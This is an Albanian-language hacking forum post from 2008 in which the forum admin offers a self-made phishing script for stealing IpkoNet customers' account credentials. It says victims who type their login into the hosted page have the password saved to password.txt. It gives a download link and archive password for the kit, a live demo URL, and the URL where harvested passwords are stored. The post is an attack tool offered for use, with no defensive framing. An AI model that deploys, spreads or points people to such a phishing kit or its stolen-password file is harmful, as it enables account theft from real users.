T1naa-Hack

Mir Se Vini
 
ForumForum  PortalPortal  PytėsoriPytėsori  KėrkoKėrko  Lista AnėtarėveLista Anėtarėve  Grupet e AnėtarėveGrupet e Anėtarėve  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 IpkoUser Hack

Shko poshtė 
AutoriMesazh
T1naa-hack
Admin


Numri i postimeve : 68
Age : 24
Registration date : 03/04/2008

MesazhTitulli: IpkoUser Hack   Wed Apr 09 2008, 14:55

Nje menyr e leht me hacku nje user t'IpkoNet-it osht me kit script qi e kum ba vet un

passi qi ti uploadojm fajllat n'FTP
dhe e shperndajm webin
kush e shkrun accountin dhe passwordin n'faqe at'her passwordi ruhet te file password.txt

Download:

Kodi:
http://conndor.net/ipkohack.rarPassword:

Kodi:
www.conndor.netDemo:

Kodi:
http://kookteam.altervista.org/ipkohack/pra tash ktu passwordi ruhet te:

Kodi:
http://kookteam.altervista.org/ipkohack/password.txt
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://t1naa-hack.net
 
IpkoUser Hack
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
T1naa-Hack :: Your first category :: Your first forum :: ......::|| Hacking & Security ||::......-
Kėrce tek: